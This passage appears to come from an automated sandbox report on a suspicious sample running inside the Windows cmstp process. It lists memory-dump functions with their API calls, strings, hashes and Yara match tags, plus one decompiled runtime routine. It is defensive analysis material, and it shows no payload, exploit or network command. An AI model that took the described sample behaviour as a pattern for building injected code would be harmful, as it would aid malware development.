                        • Instruction Fuzzy Hash: 1A90026121181042F20065694D14B07044597D0357FA1C615A5149664CC955D8A56561
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 04819B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6d17ac88a19775fc2292ff1c737fac359c907793721953d8ee8c2cc5af28aca7
                        • Instruction ID: 15bbc269aeeafe97d80e2642a5353cf68e774c8157a97fc43f0f5c15c0cd215a
                        • Opcode Fuzzy Hash: 6d17ac88a19775fc2292ff1c737fac359c907793721953d8ee8c2cc5af28aca7
                        • Instruction Fuzzy Hash: D190026124101802F140715985147070446D7D0655FA1C511A5019664D8656D9A976F1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00649090, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00649138
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: b9c762f761010023aa3a956c78046d25c5092fa93222bf7869be81922dbaa664
                        • Instruction ID: 268807a633606e07f7f712e500b0fc6dce464e1bd283927c69b028a587e3dc11
                        • Opcode Fuzzy Hash: b9c762f761010023aa3a956c78046d25c5092fa93222bf7869be81922dbaa664
                        • Instruction Fuzzy Hash: 363181B2540745BBD724DF64D885FA7B7F9FB48B00F10801DF62A5B245DA30A650CBA8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00649086, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                        Download Yara Rule
                        APIs
                        • Sleep.KERNELBASE(000007D0), ref: 00649138
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: net.dll$wininet.dll
                        • API String ID: 3472027048-1269752229
                        • Opcode ID: d6a40d16402a1a24db056d9feef0f516c07e38581f337a1dc40cad5c8c29393e
                        • Instruction ID: 2c1ee8f2fd6599ccfadd9c55f2d015a8c4a58a6c47916fca64836a4932bd8e82
                        • Opcode Fuzzy Hash: d6a40d16402a1a24db056d9feef0f516c07e38581f337a1dc40cad5c8c29393e
                        • Instruction Fuzzy Hash: FA21B4B2A40205AFD724EF64C885FABB7B5FF48700F10805DF62D5B245D770A550CBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A6B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00633AF8), ref: 0064A6AD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 0d71194933ab100d189a9c240a6cfa3af9e03a9310a285881f6a66214aee734e
                        • Instruction ID: 1eb0e73ba1baecaf28df573ed502c952461ea35f26df332dcd11831021828180
                        • Opcode Fuzzy Hash: 0d71194933ab100d189a9c240a6cfa3af9e03a9310a285881f6a66214aee734e
                        • Instruction Fuzzy Hash: BDF0AFB5240104BBDB10EF94DC85FE73368DF88354F018199F91C6B242C631A9058BE1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A640, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlAllocateHeap.NTDLL(6Ed,?,00644CAF,00644CAF,?,00644536,?,?,?,?,?,00000000,00000000,?), ref: 0064A66D
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID: 6Ed
                        • API String ID: 1279760036-410410545
                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction ID: 736962d2c2a9b78eb78641b405e774fa81f06a3ff91564b75308c743842797fa
                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                        • Instruction Fuzzy Hash: E1E012B5200208ABDB14EF99CC41EA777ADAF88654F118558BE085B242C630F9148AB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A680, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                        Download Yara Rule
                        APIs
                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00633AF8), ref: 0064A6AD
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeHeap
                        • String ID: .z`
                        • API String ID: 3298025750-1441809116
                        • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction ID: 0d4be7d5f508f622680e05367e723c13f6b0ea9c1337ec9241ea248e3d69b123
                        • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                        • Instruction Fuzzy Hash: 0EE046B5200208BBDB18EF99CC49EA777ADEF88750F018558FE085B252C630F914CAF0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00642760, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000,00000000,00633A1A,00000000), ref: 00642777
                        Strings
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Initialize
                        • String ID: @J7<
                        • API String ID: 2538663250-2016760708
                        • Opcode ID: c2a91f42d185d392a07d298eccaadfb4b711b433ba8ffed126abc7a7000f1bca
                        • Instruction ID: ba95df03718ee9ec7e1d483c4a956389e369d40af4dc5fec52cda5c5b285771e
                        • Opcode Fuzzy Hash: c2a91f42d185d392a07d298eccaadfb4b711b433ba8ffed126abc7a7000f1bca
                        • Instruction Fuzzy Hash: F0311EB5A0060AAFDB00DFD8D8809EFB7BABF88304B108559E515EB314D775EE45CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00638308, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0063836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0063838B
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: a75577774a34c661553b2d4ae1f5ac66c1ac2f586c4b4581f44203e9ec34825c
                        • Instruction ID: 9a940b6e60f646ce8941f59460d05f06adbdead5752852b8950e60ddcfc1b915
                        • Opcode Fuzzy Hash: a75577774a34c661553b2d4ae1f5ac66c1ac2f586c4b4581f44203e9ec34825c
                        • Instruction Fuzzy Hash: F501B9319812287AEB61A6A49C43FFE7B6D5B41F50F14011CFF04BA1C2DAD4690687E6
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00638310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0063836A
                        • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0063838B
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: MessagePostThread
                        • String ID:
                        • API String ID: 1836367815-0
                        • Opcode ID: 6fa9e2466c940b1058e4d170af7c8c65c6e2faa198094bd898fc85c99061f236
                        • Instruction ID: 12edc9f62851246f3998d62235cea56d176d6f76831ed9b40d55308e2441216e
                        • Opcode Fuzzy Hash: 6fa9e2466c940b1058e4d170af7c8c65c6e2faa198094bd898fc85c99061f236
                        • Instruction Fuzzy Hash: 17018431A813287AE760A6D49C03FFE776D5B40F50F040118FF04BA2C2EAA4690546EA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0063ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0063AD62
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: Load
                        • String ID:
                        • API String ID: 2234796835-0
                        • Opcode ID: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                        • Instruction ID: d88d733d0291d90222c4d844158c83fe85aac15c4e679481bd15c96a1f58f29f
                        • Opcode Fuzzy Hash: 117e98a4e37819197d72653e81a0359815b405dad333ed2bc3a335427f0668ee
                        • Instruction Fuzzy Hash: 93011EB5E0020DABDB50DBE4DC42FEDB3B99F54708F004599E90997641F631EB148B92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A6F0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0064A744
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction ID: 0ec04ccedebbb632f8ad1f00bf62aba8b369b99dffb9d8bd9461d8e81773c933
                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                        • Instruction Fuzzy Hash: C401AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A6ED, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0064A744
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateInternalProcess
                        • String ID:
                        • API String ID: 2186235152-0
                        • Opcode ID: 93b9ca38bc8d2c3fd0ee9cf105037330b6f9fea12ab1dfa659a1cf2d9c276d95
                        • Instruction ID: 40be32332cb0f07f828ec441156ba9e8f0b472ec66021a3ead12860381624768
                        • Opcode Fuzzy Hash: 93b9ca38bc8d2c3fd0ee9cf105037330b6f9fea12ab1dfa659a1cf2d9c276d95
                        • Instruction Fuzzy Hash: 0701F2B6204508ABCB44DF98DC80DEB37BDAF8C354F158248FA5997241C630E841CBA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 006491C0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0063F050,?,?,00000000), ref: 006491FC
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread
                        • String ID:
                        • API String ID: 2422867632-0
                        • Opcode ID: 76e68dc62f95f4698c16947fba794520fadff539deaa4a11adef0c5d1a858e1f
                        • Instruction ID: 831d1fb2cf8295e78b4dc99a571ad95c3dabf1a6f5a86ea0d46c42b8b745ebeb
                        • Opcode Fuzzy Hash: 76e68dc62f95f4698c16947fba794520fadff539deaa4a11adef0c5d1a858e1f
                        • Instruction Fuzzy Hash: 31E06D333902043AE3206999AC03FA7B29DDB81B20F15002AFA0DEA2C1D995F80142A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A7D1, Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0063F1D2,0063F1D2,?,00000000,?,?), ref: 0064A810
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: 4afc676668f66c3ab003b91123a40a3e60a325a861e9ba376f83291ae90e9634
                        • Instruction ID: 48050cb6743c9b10c701abf7083b2b3e6094ce47043a67d5844591c4ac07ba5f
                        • Opcode Fuzzy Hash: 4afc676668f66c3ab003b91123a40a3e60a325a861e9ba376f83291ae90e9634
                        • Instruction Fuzzy Hash: 59F0E5B1200104BFDB20DFA4CC84FD77B6AEF88240F1581A8F90C97201C531D805CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0064A7E0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0063F1D2,0063F1D2,?,00000000,?,?), ref: 0064A810
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: LookupPrivilegeValue
                        • String ID:
                        • API String ID: 3899507212-0
                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction ID: 2467b6f6639f91f9648810ab3a46fa21ad4715d5d47fd8bd44942557a55a652c
                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                        • Instruction Fuzzy Hash: 3DE01AB52002086BDB10EF89CC85EE737ADAF88650F018154BE0857241C930E8148BF5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0063F6C7, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00638D14,?), ref: 0063F6FB
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: 0020bcd5582de1466d78dc52af32aa0935b8097fbd583779eeaca0b1ef8554fa
                        • Instruction ID: 40633d2f1566317cf4820f75bd5a9421da221096b839c5ce6c738985241fabfb
                        • Opcode Fuzzy Hash: 0020bcd5582de1466d78dc52af32aa0935b8097fbd583779eeaca0b1ef8554fa
                        • Instruction Fuzzy Hash: 40D02B716403043FE700BBE88C03F5633C69B40B00F594474FA18E63C3EC60E40181A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0063F6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNELBASE(00008003,?,00638D14,?), ref: 0063F6FB
                        Memory Dump Source
                        • Source File: 0000001B.00000002.879710590.0000000000630000.00000040.00020000.sdmp, Offset: 00630000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_630000_cmstp.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorMode
                        • String ID:
                        • API String ID: 2340568224-0
                        • Opcode ID: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                        • Instruction ID: 8e639670a7425bbff1b6fd998a14efece5ed6c0bb2e491184cd633c49df84298
                        • Opcode Fuzzy Hash: b894b85e471362e4b4b601cdc184ec6d8a2c7ffee4f558636a8ef7911e72c19a
                        • Instruction Fuzzy Hash: 16D05E616503082AE710AAA49C03F6632C96B45B00F490064F948963C3DD60E4008165
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0481967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 6025b3832e9f75eefc81500ea393807917e566784b0f31610f34d3922f8edcc1
                        • Instruction ID: 74fc4eb5ed7c8a39f3fb9f42a2dac05f778e65cb686ee3b5b156a940c369fba2
                        • Opcode Fuzzy Hash: 6025b3832e9f75eefc81500ea393807917e566784b0f31610f34d3922f8edcc1
                        • Instruction Fuzzy Hash: 39B02BB18010C0C5F700D76007087173D0077C0300F23C512D3024341A0338D0C0F1B1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 0486FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E0486FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0481CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04865720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04865720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                        0x0486fdda
                        0x0486fde2
                        0x0486fde5
                        0x0486fdec
                        0x0486fdfa
                        0x0486fdff
                        0x0486fe0a
                        0x0486fe0f
                        0x0486fe17
                        0x0486fe1e
                        0x0486fe19
                        0x0486fe19
                        0x0486fe19
                        0x0486fe20
                        0x0486fe21
                        0x0486fe22
                        0x0486fe25
                        0x0486fe40

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0486FDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0486FE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0486FE01
                        Memory Dump Source
                        • Source File: 0000001B.00000002.890129561.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                        • Associated: 0000001B.00000002.890632359.00000000048CB000.00000040.00000001.sdmp Download File
                        • Associated: 0000001B.00000002.890664536.00000000048CF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_27_2_47b0000_cmstp.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: e05c3b2dd0306dea36e15e657e7be1e1d8bd2fc1a6d14e2b6fb41c17ed4b3a0d
                        • Instruction ID: 0465d68201c3e576d8d6d08af1d8d2c65dac1163adf3a85c9d68925c786fa1fa
                        • Opcode Fuzzy Hash: e05c3b2dd0306dea36e15e657e7be1e1d8bd2fc1a6d14e2b6fb41c17ed4b3a0d
                        • Instruction Fuzzy Hash: BAF021726406017FE7601A49DC02F237F5ADB44730F140719F714955E1EAA2F83097F5
                        Uniqueness

                        Uniqueness Score: -1.00%